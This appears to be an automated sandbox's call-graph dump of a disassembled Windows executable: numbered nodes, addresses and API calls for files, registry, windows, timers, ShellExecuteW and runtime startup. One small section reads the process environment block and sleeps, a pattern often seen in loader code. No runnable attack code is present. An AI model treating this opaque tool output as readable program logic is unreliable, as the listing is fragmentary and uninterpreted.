1058e74 _wcslen 98385->98387 98386 1058f63 98386->98348 98386->98354 98387->98386 98388 1058f68 98387->98388 98390 1058ea9 98387->98390 98388->98386 98394 100ce60 41 API calls 98388->98394 98390->98386 98393 100ce60 41 API calls 98390->98393 98392->98353 98393->98390 98394->98388 98395->98369 98397 100fe0b 22 API calls 98396->98397 98398 ff6295 98397->98398 98399 100fddb 22 API calls 98398->98399 98400 ff62a3 98399->98400 98400->97183 98402 ff9c7e 98401->98402 98403 103f545 98401->98403 98408 100fddb 22 API calls 98402->98408 98404 103f556 98403->98404 98406 ff6b57 22 API calls 98403->98406 98405 ffa6c3 22 API calls 98404->98405 98407 103f560 98405->98407 98406->98404 98407->98407 98409 ff9c91 98408->98409 98410 ff9cac 98409->98410 98411 ff9c9a 98409->98411 98413 ffa961 22 API calls 98410->98413 98412 ff9cb3 22 API calls 98411->98412 98414 ff9ca2 98412->98414 98413->98414 98414->97204 98415->97208 98416->97204 98418 ff6270 22 API calls 98417->98418 98428 ff9eb5 98418->98428 98419 ff9fd2 98446 ffa4a1 22 API calls __fread_nolock 98419->98446 98421 ff9fec 98421->97219 98424 103f7c4 98451 10596e2 84 API calls __wsopen_s 98424->98451 98425 103f699 98433 100fddb 22 API calls 98425->98433 98426 ffa12c __fread_nolock 98426->98424 98437 ffa405 98426->98437 98428->98419 98428->98424 98428->98425 98428->98426 98431 ffa6c3 22 API calls 98428->98431 98428->98437 98440 ffa587 22 API calls 98428->98440 98441 ffaec9 22 API calls 98428->98441 98442 ffa4a1 22 API calls 98428->98442 98445 ff4573 41 API calls _wcslen 98428->98445 98448 ff48c8 23 API calls 98428->98448 98449 ff49bd 22 API calls __fread_nolock 98428->98449 98450 ffa673 22 API calls 98428->98450 98431->98428 98432 103f7d2 98452 ffa4a1 22 API calls __fread_nolock 98432->98452 98435 103f754 98433->98435 98438 100fe0b 22 API calls 98435->98438 98436 103f7e8 98436->98421 98437->98421 98453 10596e2 84 API calls __wsopen_s 98437->98453 98438->98426 98440->98428 98443 ffa0db CharUpperBuffW 98441->98443 98442->98428 98447 ffa673 22 API calls 98443->98447 98445->98428 98446->98421 98447->98428 98448->98428 98449->98428 98450->98428 98451->98432 98452->98436 98453->98421 98508 ff54c6 98454->98508 98457 ff54c6 3 API calls 98458 100fa9a 98457->98458 98458->97248 98460 100f188 98459->98460 98461 100f14c 98459->98461 98462 ffa6c3 22 API calls 98460->98462 98461->98460 98463 100f15b 98461->98463 98469 105caeb 98462->98469 98465 100f170 98463->98465 98467 100f17d 98463->98467 98464 105cb1a 98464->97263 98514 100f18e 98465->98514 98521 105cbf2 26 API calls 98467->98521 98469->98464 98522 105ca89 ReadFile SetFilePointerEx 98469->98522 98523 ff49bd 22 API calls __fread_nolock 98469->98523 98470 100f179 98470->97263 98474 ff625f 98473->98474 98475 ff6250 98473->98475 98474->98475 98476 ff6264 CloseHandle 98474->98476 98475->97237 98476->98475 98478 ff575c CreateFileW 98477->98478 98479 1034035 98477->98479 98480 ff577b 98478->98480 98479->98480 98481 103403b CreateFileW 98479->98481 98480->97258 98480->97262 98481->98480 98482 1034063 98481->98482 98483 ff54c6 3 API calls 98482->98483 98484 103406e 98483->98484 98484->98480 98486 ff53f3 98485->98486 98497 ff53f0 messages 98485->98497 98487 ff54c6 3 API calls 98486->98487 98486->98497 98488 ff5410 98487->98488 98489 ff541d 98488->98489 98490 1033f4b 98488->98490 98491 100fe0b 22 API calls 98489->98491 98492 100fa5b 3 API calls 98490->98492 98493 ff5429 98491->98493 98492->98497 98494 ff5722 22 API calls 98493->98494 98495 ff5433 98494->98495 98496 ff9a40 2 API calls 98495->98496 98498 ff543f 98496->98498 98497->97268 98499 ff54c6 3 API calls 98498->98499 98499->98497 98500->97274 98501->97271 98502->97273 98503->97279 98504->97231 98505->97231 98506->97265 98507->97269 98513 ff54dd 98508->98513 98509 ff5564 SetFilePointerEx SetFilePointerEx 98511 ff5530 98509->98511 98510 1033f9c SetFilePointerEx 98511->98457 98512 1033f8b 98512->98510 98513->98509 98513->98510 98513->98511 98513->98512 98524 100f1d8 98514->98524 98520 100f1c1 98520->98470 98521->98470 98522->98469 98523->98469 98525 100fe0b 22 API calls 98524->98525 98526 100f1ef 98525->98526 98527 100fddb 22 API calls 98526->98527 98528 100f1a6 98527->98528 98529 ff97b6 98528->98529 98536 ff9a1e 98529->98536 98532 ff97fc 98532->98520 98535 ff6e14 24 API calls 98532->98535 98533 ff97c7 98533->98532 98543 ff9a40 98533->98543 98549 ff9b01 22 API calls __fread_nolock 98533->98549 98535->98520 98537 ff9a2f 98536->98537 98538 103f378 98536->98538 98537->98533 98539 100fddb 22 API calls 98538->98539 98540 103f382 98539->98540 98541 100fe0b 22 API calls 98540->98541 98542 103f397 98541->98542 98544 ff9abb 98543->98544 98547 ff9a4e 98543->98547 98550 100e40f SetFilePointerEx 98544->98550 98546 ff9a7c 98546->98533 98547->98546 98548 ff9a8c ReadFile 98547->98548 98548->98546 98548->98547 98549->98533 98550->98547 98551->97324 98552->97330 98553->97328 98554->97336 98555->97336 98556->97340 98557->97343 98558->97347 98559 ff105b 98564 ff344d 98559->98564 98561 ff106a 98595 10100a3 29 API calls __onexit 98561->98595 98563 ff1074 98565 ff345d __wsopen_s 98564->98565 98566 ffa961 22 API calls 98565->98566 98567 ff3513 98566->98567 98596 ff3a5a 98567->98596 98569 ff351c 98603 ff3357 98569->98603 98572 ff33c6 22 API calls 98573 ff3535 98572->98573 98609 ff515f 98573->98609 98576 ffa961 22 API calls 98577 ff354d 98576->98577 98578 ffa6c3 22 API calls 98577->98578 98579 ff3556 RegOpenKeyExW 98578->98579 98580 1033176 RegQueryValueExW 98579->98580 98585 ff3578 98579->98585 98581 1033193 98580->98581 98582 103320c RegCloseKey 98580->98582 98583 100fe0b 22 API calls 98581->98583 98582->98585 98594 103321e _wcslen 98582->98594 98584 10331ac 98583->98584 98586 ff5722 22 API calls 98584->98586 98585->98561 98587 10331b7 RegQueryValueExW 98586->98587 98588 10331d4 98587->98588 98591 10331ee messages 98587->98591 98589 ff6b57 22 API calls 98588->98589 98589->98591 98590 ff4c6d 22 API calls 98590->98594 98591->98582 98592 ff9cb3 22 API calls 98592->98594 98593 ff515f 22 API calls 98593->98594 98594->98585 98594->98590 98594->98592 98594->98593 98595->98563 98615 1031f50 98596->98615 98599 ff9cb3 22 API calls 98600 ff3a8d 98599->98600 98617 ff3aa2 98600->98617 98602 ff3a97 98602->98569 98604 1031f50 __wsopen_s 98603->98604 98605 ff3364 GetFullPathNameW 98604->98605 98606 ff3386 98605->98606 98607 ff6b57 22 API calls 98606->98607 98608 ff33a4 98607->98608 98608->98572 98610 ff516e 98609->98610 98614 ff518f __fread_nolock 98609->98614 98612 100fe0b 22 API calls 98610->98612 98611 100fddb 22 API calls 98613 ff3544 98611->98613 98612->98614 98613->98576 98614->98611 98616 ff3a67 GetModuleFileNameW 98615->98616 98616->98599 98618 1031f50 __wsopen_s 98617->98618 98619 ff3aaf GetFullPathNameW 98618->98619 98620 ff3ace 98619->98620 98621 ff3ae9 98619->98621 98622 ff6b57 22 API calls 98620->98622 98623 ffa6c3 22 API calls 98621->98623 98624 ff3ada 98622->98624 98623->98624 98627 ff37a0 98624->98627 98628 ff37ae 98627->98628 98629 ff93b2 22 API calls 98628->98629 98630 ff37c2 98629->98630 98630->98602 98631 1042a00 98645 ffd7b0 messages 98631->98645 98632 ffdb11 PeekMessageW 98632->98645 98633 ffd807 GetInputState 98633->98632 98633->98645 98635 1041cbe TranslateAcceleratorW 98635->98645 98636 ffda04 timeGetTime 98636->98645 98637 ffdb8f PeekMessageW 98637->98645 98638 ffdb73 TranslateMessage DispatchMessageW 98638->98637 98639 ffdbaf Sleep 98657 ffdbc0 98639->98657 98640 1042b74 Sleep 98640->98657 98641 1041dda timeGetTime 98752 100e300 23 API calls 98641->98752 98642 100e551 timeGetTime 98642->98657 98645->98632 98645->98633 98645->98635 98645->98636 98645->98637 98645->98638 98645->98639 98645->98640 98645->98641 98648 ffd9d5 98645->98648 98659 ffec40 256 API calls 98645->98659 98660 1001310 256 API calls 98645->98660 98663 ffdd50 98645->98663 98670 ffdfd0 98645->98670 98693 ffbf40 98645->98693 98751 100edf6 IsDialogMessageW GetClassLongW 98645->98751 98753 1063a2a 23 API calls 98645->98753 98754 106359c 82 API calls __wsopen_s 98645->98754 98646 1042c0b GetExitCodeProcess 98649 1042c37 CloseHandle 98646->98649 98650 1042c21 WaitForSingleObject 98646->98650 98649->98657 98650->98645 98650->98649 98651 1042a31 98651->98648 98652 10829bf GetForegroundWindow 98652->98657 98653 1042ca9 Sleep 98653->98645 98657->98642 98657->98645 98657->98646 98657->98648 98657->98651 98657->98652 98657->98653 98755 1075658 23 API calls 98657->98755 98756 105e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98657->98756 98757 105d4dc 47 API calls 98657->98757 98659->98645 98660->98645 98664 ffdd6f 98663->98664 98665 ffdd83 98663->98665 98758 ffd260 256 API calls 2 library calls 98664->98758 98759 106359c 82 API calls __wsopen_s 98665->98759 98667 ffdd7a 98667->98645 98669 1042f75 98669->98669 98671 ffe010 98670->98671 98680 ffe0dc messages 98671->98680 98762 1010242 5 API calls __Init_thread_wait 98671->98762 98674 1042fca 98677 ffa961 22 API calls 98674->98677 98674->98680 98675 ffe3e1 98675->98645 98676 ffa961 22 API calls 98676->98680 98678 1042fe4 98677->98678 98763 10100a3 29 API calls __onexit 98678->98763 98680->98675 98680->98676 98686 ffec40 256 API calls 98680->98686 98687 106359c 82 API calls 98680->98687 98689 ffa8c7 22 API calls 98680->98689 98690 10004f0 22 API calls 98680->98690 98760 ffa81b 41 API calls 98680->98760 98761 100a308 256 API calls 98680->98761 98765 1010242 5 API calls __Init_thread_wait 98680->98765 98766 10100a3 29 API calls __onexit 98680->98766 98767 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98680->98767 98768 10747d4 256 API calls 98680->98768 98769 10768c1 256 API calls 98680->98769 98683 1042fee 98764 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98683->98764 98686->98680 98687->98680 98689->98680 98690->98680 98770 ffadf0 98693->98770 98695 ffbf9d 98696 10404b6 98695->98696 98697 ffbfa9 98695->98697 98789 106359c 82 API calls __wsopen_s 98696->98789 98699 ffc01e 98697->98699 98700 10404c6 98697->98700 98775 ffac91 98699->98775 98790 106359c 82 API calls __wsopen_s 98700->98790 98704 ffc7da 98708 100fe0b 22 API calls 98704->98708 98705 1057120 22 API calls 98748 ffc039 __fread_nolock messages 98705->98748 98714 ffc808 __fread_nolock 98708->98714 98710 10404f5 98715 104055a 98710->98715 98791 100d217 256 API calls 98710->98791 98713 ffaf8a 22 API calls 98713->98748 98717 100fe0b 22 API calls 98714->98717 98737 ffc603 98715->98737 98792 106359c 82 API calls __wsopen_s 98715->98792 98716 ffec40 256 API calls 98716->98748 98749 ffc350 __fread_nolock messages 98717->98749 98718 104091a 98802 1063209 23 API calls 98718->98802 98720 100fddb 22 API calls 98720->98748 98722 10408a5 98723 ffec40 256 API calls 98722->98723 98724 10408cf 98723->98724 98724->98737 98800 ffa81b 41 API calls 98724->98800 98726 1040591 98793 106359c 82 API calls __wsopen_s 98726->98793 98730 10408f6 98801 106359c 82 API calls __wsopen_s 98730->98801 98731 ffbbe0 40 API calls 98731->98748 98733 ffc237 98735 ffc253 98733->98735 98736 ffa8c7 22 API calls 98733->98736 98740 1040976 98735->98740 98742 ffc297 messages 98735->98742 98736->98735 98737->98645 98738 100fe0b 22 API calls 98738->98748 98803 ffaceb 23 API calls messages 98740->98803 98743 10409bf 98742->98743 98786 ffaceb 23 API calls messages 98742->98786 98743->98737 98804 106359c 82 API calls __wsopen_s 98743->98804 98745 ffc335 98745->98743 98746 ffc342 98745->98746 98787 ffa704 22 API calls messages 98746->98787 98748->98704 98748->98705 98748->98710 98748->98713 98748->98714 98748->98715 98748->98716 98748->98718 98748->98720 98748->98722 98748->98726 98748->98730 98748->98731 98748->98733 98748->98737 98748->98738 98748->98743 98779 ffad81 98748->98779 98794 1057099 22 API calls __fread_nolock 98748->98794 98795 1075745 54 API calls _wcslen 98748->98795 98796 100aa42 22 API calls messages 98748->98796 98797 105f05c 40 API calls 98748->98797 98798 ffa993 41 API calls 98748->98798 98799 ffaceb 23 API calls messages 98748->98799 98750 ffc3ac 98749->98750 98788 100ce17 22 API calls messages 98749->98788 98750->98645 98751->98645 98752->98645 98753->98645 98754->98645 98755->98657 98756->98657 98757->98657 98758->98667 98759->98669 98760->98680 98761->98680 98762->98674 98763->98683 98764->98680 98765->98680 98766->98680 98767->98680 98768->98680 98769->98680 98771 ffae01 98770->98771 98774 ffae1c messages 98770->98774 98772 ffaec9 22 API calls 98771->98772 98773 ffae09 CharUpperBuffW 98772->98773 98773->98774 98774->98695 98776 ffacae 98775->98776 98777 ffacd1 98776->98777 98805 106359c 82 API calls __wsopen_s 98776->98805 98777->98748 98780 103fadb 98779->98780 98781 ffad92 98779->98781 98782 100fddb 22 API calls 98781->98782 98783 ffad99 98782->98783 98806 ffadcd 98783->98806 98786->98745 98787->98749 98788->98749 98789->98700 98790->98737 98791->98715 98792->98737 98793->98737 98794->98748 98795->98748 98796->98748 98797->98748 98798->98748 98799->98748 98800->98730 98801->98737 98802->98733 98803->98743 98804->98737 98805->98777 98809 ffaddd 98806->98809 98807 ffadb6 98807->98748 98808 100fddb 22 API calls 98808->98809 98809->98807 98809->98808 98810 ffa961 22 API calls 98809->98810 98811 ffadcd 22 API calls 98809->98811 98812 ffa8c7 22 API calls 98809->98812 98810->98809 98811->98809 98812->98809 98813 1032ba5 98814 ff2b25 98813->98814 98815 1032baf 98813->98815 98841 ff2b83 7 API calls 98814->98841 98817 ff3a5a 24 API calls 98815->98817 98819 1032bb8 98817->98819 98821 ff9cb3 22 API calls 98819->98821 98823 1032bc6 98821->98823 98822 ff2b2f 98831 ff2b44 98822->98831 98845 ff3837 49 API calls ___scrt_fastfail 98822->98845 98824 1032bf5 98823->98824 98825 1032bce 98823->98825 98826 ff33c6 22 API calls 98824->98826 98828 ff33c6 22 API calls 98825->98828 98839 1032bf1 GetForegroundWindow ShellExecuteW 98826->98839 98829 1032bd9 98828->98829 98832 ff6350 22 API calls 98829->98832 98833 ff2b5f 98831->98833 98846 ff30f2 Shell_NotifyIconW ___scrt_fastfail 98831->98846 98836 1032be7 98832->98836 98837 ff2b66 SetCurrentDirectoryW 98833->98837 98834 1032c26 98834->98833 98838 ff33c6 22 API calls 98836->98838 98840 ff2b7a 98837->98840 98838->98839 98839->98834 98847 ff2cd4 7 API calls 98841->98847 98843 ff2b2a 98844 ff2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98843->98844 98844->98822 98845->98831 98846->98833 98847->98843 98848 ff1098 98853 ff42de 98848->98853 98852 ff10a7 98854 ffa961 22 API calls 98853->98854 98855 ff42f5 GetVersionExW 98854->98855 98856 ff6b57 22 API calls 98855->98856 98857 ff4342 98856->98857 98858 ff93b2 22 API calls 98857->98858 98870 ff4378 98857->98870 98859 ff436c 98858->98859 98861 ff37a0 22 API calls 98859->98861 98860 ff441b GetCurrentProcess IsWow64Process 98862 ff4437 98860->98862 98861->98870 98863 ff444f LoadLibraryA 98862->98863 98864 1033824 GetSystemInfo 98862->98864 98865 ff449c GetSystemInfo 98863->98865 98866 ff4460 GetProcAddress 98863->98866 98867 ff4476 98865->98867 98866->98865 98869 ff4470 GetNativeSystemInfo 98866->98869 98871 ff447a FreeLibrary 98867->98871 98872 ff109d 98867->98872 98868 10337df 98869->98867 98870->98860 98870->98868 98871->98872 98873 10100a3 29 API calls __onexit 98872->98873 98873->98852 98874 ff2e37 98875 ffa961 22 API calls 98874->98875 98876 ff2e4d 98875->98876 98953 ff4ae3 98876->98953 98878 ff2e6b 98879 ff3a5a 24 API calls 98878->98879 98880 ff2e7f 98879->98880 98881 ff9cb3 22 API calls 98880->98881 98882 ff2e8c 98881->98882 98883 ff4ecb 94 API calls 98882->98883 98884 ff2ea5 98883->98884 98885 ff2ead 98884->98885 98886 1032cb0 98884->98886 98890 ffa8c7 22 API calls 98885->98890 98983 1062cf9 98886->98983 98888 1032cc3 98889 1032ccf 98888->98889 98891 ff4f39 68 API calls 98888->98891 98895 ff4f39 68 API calls 98889->98895 98892 ff2ec3 98890->98892 98891->98889 98967 ff6f88 22 API calls 98892->98967 98894 ff2ecf 98896 ff9cb3 22 API calls 98894->98896 98897 1032ce5 98895->98897 98898 ff2edc 98896->98898 99009 ff3084 22 API calls 98897->99009 98968 ffa81b 41 API calls 98898->98968 98901 ff2eec 98903 ff9cb3 22 API calls 98901->98903 98902 1032d02 99010 ff3084 22 API calls 98902->99010 98905 ff2f12 98903->98905 98969 ffa81b 41 API calls 98905->98969 98906 1032d1e 98908 ff3a5a 24 API calls 98906->98908 98909 1032d44 98908->98909 99011 ff3084 22 API calls 98909->99011 98910 ff2f21 98912 ffa961 22 API calls 98910->98912 98914 ff2f3f 98912->98914 98913 1032d50 98915 ffa8c7 22 API calls 98913->98915 98970 ff3084 22 API calls 98914->98970 98917 1032d5e 98915->98917 99012 ff3084 22 API calls 98917->99012 98918 ff2f4b 98971 1014a28 40 API calls 3 library calls 98918->98971 98921 1032d6d 98924 ffa8c7 22 API calls 98921->98924 98922 ff2f59 98922->98897 98923 ff2f63 98922->98923 98972 1014a28 40 API calls 3 library calls 98923->98972 98926 1032d83 98924->98926 99013 ff3084 22 API calls 98926->99013 98927 ff2f6e 98927->98902 98929 ff2f78 98927->98929 98973 1014a28 40 API calls 3 library calls 98929->98973 98930 1032d90 98932 ff2f83 98932->98906 98933 ff2f8d 98932->98933 98974 1014a28 40 API calls 3 library calls 98933->98974 98935 ff2f98 98936 ff2fdc 98935->98936 98975 ff3084 22 API calls 98935->98975 98936->98921 98937 ff2fe8 98936->98937 98937->98930 98977 ff63eb 22 API calls 98937->98977 98939 ff2fbf 98941 ffa8c7 22 API calls 98939->98941 98943 ff2fcd 98941->98943 98942 ff2ff8 98978 ff6a50 22 API calls 98942->98978 98976 ff3084 22 API calls 98943->98976 98946 ff3006 98979 ff70b0 23 API calls 98946->98979 98950 ff3021 98951 ff3065 98950->98951 98980 ff6f88 22 API calls 98950->98980 98981 ff70b0 23 API calls 98950->98981 98982 ff3084 22 API calls 98950->98982 98954 ff4af0 __wsopen_s 98953->98954 98955 ff6b57 22 API calls 98954->98955 98956 ff4b22 98954->98956 98955->98956 98957 ff4c6d 22 API calls 98956->98957 98963 ff4b58 98956->98963 98957->98956 98958 ff9cb3 22 API calls 98960 ff4c52 98958->98960 98959 ff9cb3 22 API calls 98959->98963 98962 ff515f 22 API calls 98960->98962 98961 ff4c6d 22 API calls 98961->98963 98965 ff4c5e 98962->98965 98963->98959 98963->98961 98964 ff515f 22 API calls 98963->98964 98966 ff4c29 98963->98966 98964->98963 98965->98878 98966->98958 98966->98965 98967->98894 98968->98901 98969->98910 98970->98918 98971->98922 98972->98927 98973->98932 98974->98935 98975->98939 98976->98936 98977->98942 98978->98946 98979->98950 98980->98950 98981->98950 98982->98950 98984 1062d15 98983->98984 98985 ff511f 64 API calls 98984->98985 98986 1062d29 98985->98986 98987 1062e66 75 API calls 98986->98987 98988 1062d3b 98987->98988 98989 ff50f5 40 API calls 98988->98989 99006 1062d3f 98988->99006 98990 1062d56 98989->98990 98991 ff50f5 40 API calls 98990->98991 98992 1062d66 98991->98992 98993 ff50f5 40 API calls 98992->98993 98994 1062d81 98993->98994 98995 ff50f5 40 API calls 98994->98995 98996 1062d9c 98995->98996 98997 ff511f 64 API calls 98996->98997 98998 1062db3 98997->98998 98999 101ea0c ___std_exception_copy 21 API calls 98998->98999 99000 1062dba 98999->99000 99001 101ea0c ___std_exception_copy 21 API calls 99000->99001 99002 1062dc4 99001->99002 99003 ff50f5 40 API calls 99002->99003 99004 1062dd8 99003->99004 99005 10628fe 27 API calls 99004->99005 99007 1062dee 99005->99007 99006->98888 99007->99006 99008 10622ce 79 API calls 99007->99008 99008->99006 99009->98902 99010->98906 99011->98913 99012->98921 99013->98930 99014 10103e9 99019 10109d5 SetUnhandledExceptionFilter 99014->99019 99016 10103ee pre_c_initialization 99020 1014fa9 26 API calls 2 library calls 99016->99020 99018 10103f9 99019->99016 99020->99018 99021 192410 99037 190000 99021->99037 99023 192534 99040 192300 99023->99040 99043 193580 GetPEB 99037->99043 99039 19068b 99039->99023 99041 192309 Sleep 99040->99041 99042 192317 99041->99042 99044 1935aa 99043->99044 99044->99039 99045 ff3156 99048 ff3170 99045->99048 99049 ff3187 99048->99049 99050 ff318c 99049->99050 99051 ff31eb 99049->99051 99088 ff31e9 99049->99088 99055 ff3199 99050->99055 99056 ff3265 PostQuitMessage 99050->99056 99053 1032dfb 99051->99053 99054 ff31f1 99051->99054 99052 ff31d0 DefWindowProcW 99089 ff316a 99052->99089 99097 ff18e2 10 API calls 99053->99097 99057 ff321d SetTimer RegisterWindowMessageW 99054->99057 99058 ff31f8 99054->99058 99060 ff31a4 99055->99060 99061 1032e7c 99055->99061 99056->99089 99065 ff3246 CreatePopupMenu 99057->99065 99057->99089 99062 ff3201 KillTimer 99058->99062 99063 1032d9c 99058->99063 99066 ff31ae 99060->99066 99067 1032e68 99060->99067 99103 105bf30 34 API calls ___scrt_fastfail 99061->99103 99093 ff30f2 Shell_NotifyIconW ___scrt_fastfail 99062->99093 99074 1032da1 99063->99074 99075 1032dd7 MoveWindow 99063->99075 99064 1032e1c 99098 100e499 42 API calls 99064->99098 99065->99089 99072 ff31b9 99066->99072 99073 1032e4d 99066->99073 99102 105c161 27 API calls ___scrt_fastfail 99067->99102 99080 ff31c4 99072->99080 99081 ff3253 99072->99081 99073->99052 99101 1050ad7 22 API calls 99073->99101 99076 1032da7 99074->99076 99077 1032dc6 SetFocus 99074->99077 99075->99089 99076->99080 99083 1032db0 99076->99083 99077->99089 99078 ff3214 99094 ff3c50 DeleteObject DestroyWindow 99078->99094 99079 ff3263 99079->99089 99080->99052 99099 ff30f2 Shell_NotifyIconW ___scrt_fastfail 99080->99099 99095 ff326f 44 API calls ___scrt_fastfail 99081->99095 99082 1032e8e 99082->99052 99082->99089 99096 ff18e2 10 API calls 99083->99096 99088->99052 99091 1032e41 99100 ff3837 49 API calls ___scrt_fastfail 99091->99100 99093->99078 99094->99089 99095->99079 99096->99089 99097->99064 99098->99080 99099->99091 99100->99088 99101->99088 99102->99079 99103->99082 99104 ff1033 99109 ff4c91 99104->99109 99108 ff1042 99110 ffa961 22 API calls 99109->99110 99111 ff4cff 99110->99111 99118 ff3af0 99111->99118 99113 1033cb6 99115 ff4d9c 99115->99113 99116 ff1038 99115->99116 99121 ff51f7 22 API calls __fread_nolock 99115->99121 99117 10100a3 29 API calls __onexit 99116->99117 99117->99108 99122 ff3b1c 99118->99122 99121->99115 99123 ff3b0f 99122->99123 99124 ff3b29 99122->99124 99123->99115 99124->99123 99125 ff3b30 RegOpenKeyExW 99124->99125 99125->99123 99126 ff3b4a RegQueryValueExW 99125->99126 99127 ff3b6b 99126->99127 99128 ff3b80 RegCloseKey 99126->99128 99127->99128 99128->99123 99129 ff1cad SystemParametersInfoW 99130 10290fa 99131 1029107 99130->99131 99135 102911f 99130->99135 99180 101f2d9 20 API calls _abort 99131->99180 99133 102910c 99181 10227ec 26 API calls pre_c_initialization 99133->99181 99139 102917a 99135->99139 99144 1029117 99135->99144 99182 102fdc4 21 API calls 2 library calls 99135->99182 99136 101d955 __fread_nolock 26 API calls 99138 1029192 99136->99138 99150 1028c32 99138->99150 99139->99136 99141 1029199 99142 101d955 __fread_nolock 26 API calls 99141->99142 99141->99144 99143 10291c5 99142->99143 99143->99144 99145 101d955 __fread_nolock 26 API calls 99143->99145 99146 10291d3 99145->99146 99146->99144 99147 101d955 __fread_nolock 26 API calls 99146->99147 99148 10291e3 99147->99148 99149 101d955 __fread_nolock 26 API calls 99148->99149 99149->99144 99151 1028c3e ___scrt_is_nonwritable_in_current_image 99150->99151 99152 1028c46 99151->99152 99153 1028c5e 99151->99153 99184 101f2c6 20 API calls _abort 99152->99184 99154 1028d24 99153->99154 99159 1028c97 99153->99159 99191 101f2c6 20 API calls _abort 99154->99191 99156 1028c4b 99185 101f2d9 20 API calls _abort 99156->99185 99162 1028ca6 99159->99162 99163 1028cbb 99159->99163 99160 1028d29 99192 101f2d9 20 API calls _abort 99160->99192 99161 1028c53 __wsopen_s 99161->99141 99186 101f2c6 20 API calls _abort 99162->99186 99183 1025147 EnterCriticalSection 99163->99183 99167 1028cb3 99193 10227ec 26 API calls pre_c_initialization 99167->99193 99168 1028cab 99187 101f2d9 20 API calls _abort 99168->99187 99169 1028cc1 99172 1028cf2 99169->99172 99173 1028cdd 99169->99173 99175 1028d45 __fread_nolock 38 API calls 99172->99175 99188 101f2d9 20 API calls _abort 99173->99188 99178 1028ced 99175->99178 99176 1028ce2 99189 101f2c6 20 API calls _abort 99176->99189 99190 1028d1c LeaveCriticalSection __wsopen_s 99178->99190 99180->99133 99181->99144 99182->99139 99183->99169 99184->99156 99185->99161 99186->99168 99187->99167 99188->99176 99189->99178 99190->99161 99191->99160 99192->99167 99193->99161 99194 ffdee5 99197 ffb710 99194->99197 99198 ffb72b 99197->99198 99199 1040146 99198->99199 99200 10400f8 99198->99200 99227 ffb750 99198->99227 99239 10758a2 256 API calls 2 library calls 99199->99239 99203 1040102 99200->99203 99206 104010f 99200->99206 99200->99227 99237 1075d33 256 API calls 99203->99237 99223 ffba20 99206->99223 99238 10761d0 256 API calls 2 library calls 99206->99238 99209 10403d9 99209->99209 99213 ffba4e 99214 1040322 99242 1075c0c 82 API calls 99214->99242 99221 100d336 40 API calls 99221->99227 99222 ffbbe0 40 API calls 99222->99227 99223->99213 99243 106359c 82 API calls __wsopen_s 99223->99243 99224 ffec40 256 API calls 99224->99227 99225 ffa8c7 22 API calls 99225->99227 99227->99213 99227->99214 99227->99221 99227->99222 99227->99223 99227->99224 99227->99225 99228 ffa81b 41 API calls 99227->99228 99229 100d2f0 40 API calls 99227->99229 99230 100a01b 256 API calls 99227->99230 99231 1010242 5 API calls __Init_thread_wait 99227->99231 99232 100edcd 22 API calls 99227->99232 99233 10100a3 29 API calls __onexit 99227->99233 99234 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99227->99234 99235 100ee53 82 API calls 99227->99235 99236 100e5ca 256 API calls 99227->99236 99240 ffaceb 23 API calls messages 99227->99240 99241 104f6bf 23 API calls 99227->99241 99228->99227 99229->99227 99230->99227 99231->99227 99232->99227 99233->99227 99234->99227 99235->99227 99236->99227 99237->99206 99238->99223 99239->99227 99240->99227 99241->99227 99242->99223 99243->99209 99244 10103fb 99245 1010407 ___scrt_is_nonwritable_in_current_image 99244->99245 99273 100feb1 99245->99273 99247 101040e 99248 1010561 99247->99248 99251 1010438 99247->99251 99300 101083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99248->99300 99250 1010568 99301 1014e52 28 API calls _abort 99250->99301 99262 1010477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99251->99262 99284 102247d 99251->99284 99253 101056e 99302 1014e04 28 API calls _abort 99253->99302 99257 1010576 99258 1010457 99260 10104d8 99292 1010959 99260->99292 99262->99260 99296 1014e1a 38 API calls 3 library calls 99262->99296 99264 10104de 99265 10104f3 99264->99265 99297 1010992 GetModuleHandleW 99265->99297 99267 10104fa 99267->99250 99268 10104fe 99267->99268 99269 1010507 99268->99269 99298 1014df5 28 API calls _abort 99268->99298 99299 1010040 13 API calls 2 library calls 99269->99299 99272 101050f 99272->99258 99274 100feba 99273->99274 99303 1010698 IsProcessorFeaturePresent 99274->99303 99276 100fec6 99304 1012c94 99276->99304 99278 100fecb 99279 100fecf 99278->99279 99313 1022317 99278->99313 99279->99247 99282 100fee6 99282->99247 99286 1022494 99284->99286 99285 1010a8c CatchGuardHandler 5 API calls 99287 1010451 99285->99287 99286->99285 99287->99258 99288 1022421 99287->99288 99289 1022450 99288->99289 99290 1010a8c CatchGuardHandler 5 API calls 99289->99290 99291 1022479 99290->99291 99291->99262 99398 1012340 99292->99398 99294 101096c GetStartupInfoW 99295 101097f 99294->99295 99295->99264 99296->99260 99297->99267 99298->99269 99299->99272 99300->99250 99301->99253 99302->99257 99303->99276 99305 1012c99 ___vcrt_initialize_winapi_thunks 99304->99305 99317 1013462 99305->99317 99308 1012ca7 99308->99278 99310 1012caf 99311 1012cba 99310->99311 99331 101349e DeleteCriticalSection 99310->99331 99311->99278 99359 102d1f6 99313->99359 99316 1012cbd 8 API calls 3 library calls 99316->99279 99318 101346b 99317->99318 99320 1013494 99318->99320 99321 1012ca3 99318->99321 99332 10136ef 99318->99332 99337 101349e DeleteCriticalSection 99320->99337 99321->99308 99323 1013414 99321->99323 99352 1013600 99323->99352 99326 1013429 99326->99310 99328 1013437 99329 1013444 99328->99329 99358 1013447 6 API calls ___vcrt_FlsFree 99328->99358 99329->99310 99331->99308 99338 1013591 99332->99338 99334 1013709 99335 1013727 InitializeCriticalSectionAndSpinCount 99334->99335 99336 1013712 99334->99336 99335->99336 99336->99318 99337->99321 99339 10135b9 99338->99339 99342 10135b5 __crt_fast_encode_pointer 99338->99342 99339->99342 99345 10134cd 99339->99345 99342->99334 99343 10135d3 GetProcAddress 99343->99342 99344 10135e3 __crt_fast_encode_pointer 99343->99344 99344->99342 99350 10134dc try_get_first_available_module 99345->99350 99346 10134f9 LoadLibraryExW 99348 1013514 GetLastError 99346->99348 99346->99350 99347 1013586 99347->99342 99347->99343 99348->99350 99349 101356f FreeLibrary 99349->99350 99350->99346 